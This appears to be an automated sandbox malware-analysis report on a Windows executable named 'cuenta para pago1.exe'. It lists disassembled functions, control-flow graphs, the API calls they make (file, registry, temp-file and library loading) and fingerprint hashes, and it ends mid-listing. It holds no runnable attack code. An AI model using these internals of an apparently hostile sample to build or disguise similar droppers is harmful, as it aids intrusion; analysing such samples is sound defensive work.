                                                                                      control_flow_graph 639 4025e5-4025fa call 402ba2 642 402600-402607 639->642 643 402a4c-402a4f 639->643 644 402609 642->644 645 40260c-40260f 642->645 646 402a55-402a5b 643->646 644->645 647 402773-40277b 645->647 648 402615-402624 call 405f7a 645->648 647->643 648->647 652 40262a 648->652 653 402630-402634 652->653 654 4026c9-4026cc 653->654 655 40263a-402655 ReadFile 653->655 656 4026e4-4026f4 call 405c72 654->656 657 4026ce-4026d1 654->657 655->647 658 40265b-402660 655->658 656->647 668 4026f6 656->668 657->656 659 4026d3-4026de call 405cd0 657->659 658->647 661 402666-402674 658->661 659->647 659->656 664 40267a-40268c MultiByteToWideChar 661->664 665 40272f-40273b call 405f61 661->665 664->668 669 40268e-402691 664->669 665->646 671 4026f9-4026fc 668->671 672 402693-40269e 669->672 671->665 673 4026fe-402703 671->673 672->671 674 4026a0-4026c5 SetFilePointer MultiByteToWideChar 672->674 675 402740-402744 673->675 676 402705-40270a 673->676 674->672 677 4026c7 674->677 678 402761-40276d SetFilePointer 675->678 679 402746-40274a 675->679 676->675 680 40270c-40271f 676->680 677->668 678->647 681 402752-40275f 679->681 682 40274c-402750 679->682 680->647 683 402721-402727 680->683 681->647 682->678 682->681 683->653 684 40272d 683->684 684->647
                                                                                      APIs
                                                                                      • ReadFile.KERNELBASE(?,?,?,?), ref: 0040264D
                                                                                      • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,?), ref: 00402688
                                                                                      • SetFilePointer.KERNELBASE(?,?,?,?,?,00000008,?,?,?,?), ref: 004026AB
                                                                                      • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,?,?,?,?,00000008,?,?,?,?), ref: 004026C1
                                                                                        • Part of subcall function 00405CD0: SetFilePointer.KERNEL32(?,00000000,00000000,?), ref: 00405CE6
                                                                                      • SetFilePointer.KERNEL32(?,?,?,?,?,?,00000002), ref: 0040276D
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.4057716866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057793008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4058123660.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                      • String ID: 9
                                                                                      • API String ID: 163830602-2366072709
                                                                                      • Opcode ID: fd3803aa03de2e8909da2f617b558eaad47c0c0dea7754e7ccd67b1cd56bd7db
                                                                                      • Instruction ID: af7b16596185cfa7f969e470bfe402a155c7c568a05af23699f2fbc440ccd5d4
                                                                                      • Opcode Fuzzy Hash: fd3803aa03de2e8909da2f617b558eaad47c0c0dea7754e7ccd67b1cd56bd7db
                                                                                      • Instruction Fuzzy Hash: DF514A74D00219AADF209F94C988AAEB779FF04304F50447BE501F72D0D7B89D42DB69
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00406384 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 685 406384-4063a4 GetSystemDirectoryW 686 4063a6 685->686 687 4063a8-4063aa 685->687 686->687 688 4063bb-4063bd 687->688 689 4063ac-4063b5 687->689 691 4063be-4063f1 wsprintfW LoadLibraryExW 688->691 689->688 690 4063b7-4063b9 689->690 690->691
                                                                                      APIs
                                                                                      • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040639B
                                                                                      • wsprintfW.USER32 ref: 004063D6
                                                                                      • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 004063EA
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.4057716866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057793008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4058123660.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                      • String ID: %s%S.dll$UXTHEME$\
                                                                                      • API String ID: 2200240437-1946221925
                                                                                      • Opcode ID: 593f7811ea388f5a47145f6632eb7b382babc1da37006913c6aa5b6fd682aae8
                                                                                      • Instruction ID: 69ae2dd3acfd93707f2d49264f8241546f9c5af57f384429b5f7a638f8549ddd
                                                                                      • Opcode Fuzzy Hash: 593f7811ea388f5a47145f6632eb7b382babc1da37006913c6aa5b6fd682aae8
                                                                                      • Instruction Fuzzy Hash: 6BF0B170910119A7DF14A764DC0DF9B366CA700744F604476AA07F11D1EB7CEB65C7E9
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00403027 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 155COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 692 403027-40303e 693 403040 692->693 694 403047-40304f 692->694 693->694 695 403051 694->695 696 403056-40305b 694->696 695->696 697 40306b-403078 call 40320c 696->697 698 40305d-403066 call 403222 696->698 702 4031c3 697->702 703 40307e-403082 697->703 698->697 706 4031c5-4031c6 702->706 704 403088-4030a8 GetTickCount call 406513 703->704 705 4031ac-4031ae 703->705 716 403202 704->716 718 4030ae-4030b6 704->718 707 4031b0-4031b3 705->707 708 4031f7-4031fb 705->708 710 403205-403209 706->710 711 4031b5 707->711 712 4031b8-4031c1 call 40320c 707->712 713 4031c8-4031ce 708->713 714 4031fd 708->714 711->712 712->702 725 4031ff 712->725 719 4031d0 713->719 720 4031d3-4031e1 call 40320c 713->720 714->716 716->710 722 4030b8 718->722 723 4030bb-4030c9 call 40320c 718->723 719->720 720->702 729 4031e3-4031ef call 405ca1 720->729 722->723 723->702 730 4030cf-4030d8 723->730 725->716 734 4031f1-4031f4 729->734 735 4031a8-4031aa 729->735 733 4030de-4030fb call 406533 730->733 738 403101-403118 GetTickCount 733->738 739 4031a4-4031a6 733->739 734->708 735->706 740 403163-403165 738->740 741 40311a-403122 738->741 739->706 744 403167-40316b 740->744 745 403198-40319c 740->745 742 403124-403128 741->742 743 40312a-40315b MulDiv wsprintfW call 405179 741->743 742->740 742->743 750 403160 743->750 747 403180-403186 744->747 748 40316d-403172 call 405ca1 744->748 745->718 749 4031a2 745->749 752 40318c-403190 747->752 753 403177-403179 748->753 749->716 750->740 752->733 754 403196 752->754 753->735 755 40317b-40317e 753->755 754->716 755->752
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.4057716866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057793008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4058123660.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: CountTick$wsprintf
                                                                                      • String ID: ... %d%%
                                                                                      • API String ID: 551687249-2449383134
                                                                                      • Opcode ID: 684f5030c79bc3ddb9bb75536ee51c67afbd92a3f7865a882cb7187bdb02bce5
                                                                                      • Instruction ID: d56137d6e4a505209b2495a9ad0e903af7b2eaecc34ac4602261a913104377f3
                                                                                      • Opcode Fuzzy Hash: 684f5030c79bc3ddb9bb75536ee51c67afbd92a3f7865a882cb7187bdb02bce5
                                                                                      • Instruction Fuzzy Hash: 95517A71900219ABCB10CF65D944BAF3FA8AB08766F14457BE911BB2C1C7789E50CBED
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040237B Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71registrystringCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 756 40237b-4023c1 call 402cb4 call 402bbf * 2 RegCreateKeyExW 763 4023c7-4023cf 756->763 764 402a4c-402a5b 756->764 765 4023d1-4023de call 402bbf lstrlenW 763->765 766 4023e2-4023e5 763->766 765->766 769 4023f5-4023f8 766->769 770 4023e7-4023f4 call 402ba2 766->770 774 402409-40241d RegSetValueExW 769->774 775 4023fa-402404 call 403027 769->775 770->769 778 402422-4024fc RegCloseKey 774->778 779 40241f 774->779 775->774 778->764 781 40281e-402825 778->781 779->778 781->764
                                                                                      APIs
                                                                                      • RegCreateKeyExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B9
                                                                                      • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsqE113.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023D9
                                                                                      • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsqE113.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402415
                                                                                      • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsqE113.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.4057716866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057793008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4058123660.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseCreateValuelstrlen
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nsqE113.tmp
                                                                                      • API String ID: 1356686001-882796675
                                                                                      • Opcode ID: 90e2c532cef6f7d866fc85d66413cbe16e3cd5261a2574de0a4410d976b13d76
                                                                                      • Instruction ID: 604b722b9c55a9196ccdb8bc5d46c0fd7c9d49ef9fceb37282f2360b7a100841
                                                                                      • Opcode Fuzzy Hash: 90e2c532cef6f7d866fc85d66413cbe16e3cd5261a2574de0a4410d976b13d76
                                                                                      • Instruction Fuzzy Hash: 1B11AE71E00108BFEB10AFA4DE89EAE767CEB54358F10403AF904B61D1D6B85E419628
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00405C1E Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 37COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 782 405c1e-405c2a 783 405c2b-405c5f GetTickCount GetTempFileNameW 782->783 784 405c61-405c63 783->784 785 405c6e-405c70 783->785 784->783 786 405c65 784->786 787 405c68-405c6b 785->787 786->787
                                                                                      APIs
                                                                                      • GetTickCount.KERNEL32 ref: 00405C3C
                                                                                      • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\cuenta para pago1.exe",00403268,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403492), ref: 00405C57
                                                                                      Strings
                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00405C23
                                                                                      • nsa, xrefs: 00405C2B
                                                                                      • "C:\Users\user\Desktop\cuenta para pago1.exe", xrefs: 00405C1E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.4057716866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057793008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4058123660.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: CountFileNameTempTick
                                                                                      • String ID: "C:\Users\user\Desktop\cuenta para pago1.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                                      • API String ID: 1716503409-2241679662
                                                                                      • Opcode ID: b475e38dea5fb3e2c0bd2ffad844489a64f4d901e003652483f57aed9986a0af
                                                                                      • Instruction ID: a4e54dcc62cd1b6bfc855809a1f33464b5edbff741e4ba4f72954512b04b2574
                                                                                      • Opcode Fuzzy Hash: b475e38dea5fb3e2c0bd2ffad844489a64f4d901e003652483f57aed9986a0af
                                                                                      • Instruction Fuzzy Hash: 58F09076B04204BBEB009F5ADD49ADFB7ACEB91710F10403AF900E7190E2B0AE44CB64
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00402BFF Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?), ref: 00402C20
                                                                                      • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402C5C
                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00402C65
                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00402C8A
                                                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402CA8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.4057716866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057793008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4058123660.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: Close$DeleteEnumOpen
                                                                                      • String ID:
                                                                                      • API String ID: 1912718029-0
                                                                                      • Opcode ID: fdbde4e884f383338cc21de88dd7407a01aefe671536b7f53bbd552f7ed090ed
                                                                                      • Instruction ID: 13aa261ecf2a86817b53105e55b29f339a5543dfd3ea7b5a0579e289bf8829aa
                                                                                      • Opcode Fuzzy Hash: fdbde4e884f383338cc21de88dd7407a01aefe671536b7f53bbd552f7ed090ed
                                                                                      • Instruction Fuzzy Hash: 04116A71908118FFEF119F90DE8CEAE3B79FB14384F100476FA05A11A0D3B49E52AA69
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 10001759 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 118COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D83
                                                                                        • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D88
                                                                                        • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D8D
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 10001804
                                                                                      • FreeLibrary.KERNEL32(?), ref: 1000187B
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 100018A0
                                                                                        • Part of subcall function 10002286: GlobalAlloc.KERNEL32(00000040,00001020), ref: 100022B8
                                                                                        • Part of subcall function 10002645: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,100017D5,00000000), ref: 100026B7
                                                                                        • Part of subcall function 100015B4: lstrcpyW.KERNEL32(00000000,10004020), ref: 100015CD
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4068876231.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                      • Associated: 00000000.00000002.4068842862.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4068909846.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4068953066.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_10000000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: Global$Free$Alloc$Librarylstrcpy
                                                                                      • String ID:
                                                                                      • API String ID: 1791698881-3916222277
                                                                                      • Opcode ID: d19b98991503ed1f4222ee02892706a0c20354a75bd4722b3fc13797bb1a772f
                                                                                      • Instruction ID: d353a68b508970880cf9150dbe01e0f77130c4103e9cfdf2e47557ee24e57a3c
                                                                                      • Opcode Fuzzy Hash: d19b98991503ed1f4222ee02892706a0c20354a75bd4722b3fc13797bb1a772f
                                                                                      • Instruction Fuzzy Hash: 5E31BF75804241AAFB14DF749CC9BDA37E8FF053D0F158065FA0A9A08FDF74A9848761
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00401BDF Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C3F
                                                                                      • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C57
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.4057716866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057793008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4058123660.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$Timeout
                                                                                      • String ID: !
                                                                                      • API String ID: 1777923405-2657877971
                                                                                      • Opcode ID: 8e95b372dd1f90357ee07302f12d9dd43e1fde52ce919f1a5202f9c54fc75036
                                                                                      • Instruction ID: a86adb03786c756a90e8c754dee758adf3648459c58847ecf436330ca9d5af9c
                                                                                      • Opcode Fuzzy Hash: 8e95b372dd1f90357ee07302f12d9dd43e1fde52ce919f1a5202f9c54fc75036
                                                                                      • Instruction Fuzzy Hash: B121B071944209BEEF01AFB0CE4AABE7B75EB40304F10403EF601B61D1D6B89A40DB69
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00405EE7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45registryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?,00000002,Call,?,0040615A,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405F11
                                                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?,?,0040615A,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405F32
                                                                                      • RegCloseKey.ADVAPI32(?,?,0040615A,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405F55
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.4057716866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057793008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4058123660.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseOpenQueryValue
                                                                                      • String ID: Call
                                                                                      • API String ID: 3677997916-1824292864
                                                                                      • Opcode ID: c3918b15ec2dd140c4f3d1bafefc28aadc87a0cff0ebfff7b8d124f540ee4f6a
                                                                                      • Instruction ID: 1229758a71a34d9b3841ebc19c7c3eba7c9bd897b4c963cc492d8629085b1b1e
                                                                                      • Opcode Fuzzy Hash: c3918b15ec2dd140c4f3d1bafefc28aadc87a0cff0ebfff7b8d124f540ee4f6a
                                                                                      • Instruction Fuzzy Hash: B9011E3255020AEADF21CF55ED09EDB3BA9EF55350F004036F905D6160D335D964DFA5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00401E66 Relevance: 6.1, APIs: 4, Instructions: 52synchronizationCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00405179: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsqE113.tmp\System.dll,00000000,0040FEA0,00000000,?,?,?,?,?,?,?,?,?,00403160,00000000,?), ref: 004051B1
                                                                                        • Part of subcall function 00405179: lstrlenW.KERNEL32(00403160,Skipped: C:\Users\user\AppData\Local\Temp\nsqE113.tmp\System.dll,00000000,0040FEA0,00000000,?,?,?,?,?,?,?,?,?,00403160,00000000), ref: 004051C1
                                                                                        • Part of subcall function 00405179: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsqE113.tmp\System.dll,00403160), ref: 004051D4
                                                                                        • Part of subcall function 00405179: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsqE113.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsqE113.tmp\System.dll), ref: 004051E6
                                                                                        • Part of subcall function 00405179: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040520C
                                                                                        • Part of subcall function 00405179: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405226
                                                                                        • Part of subcall function 00405179: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405234
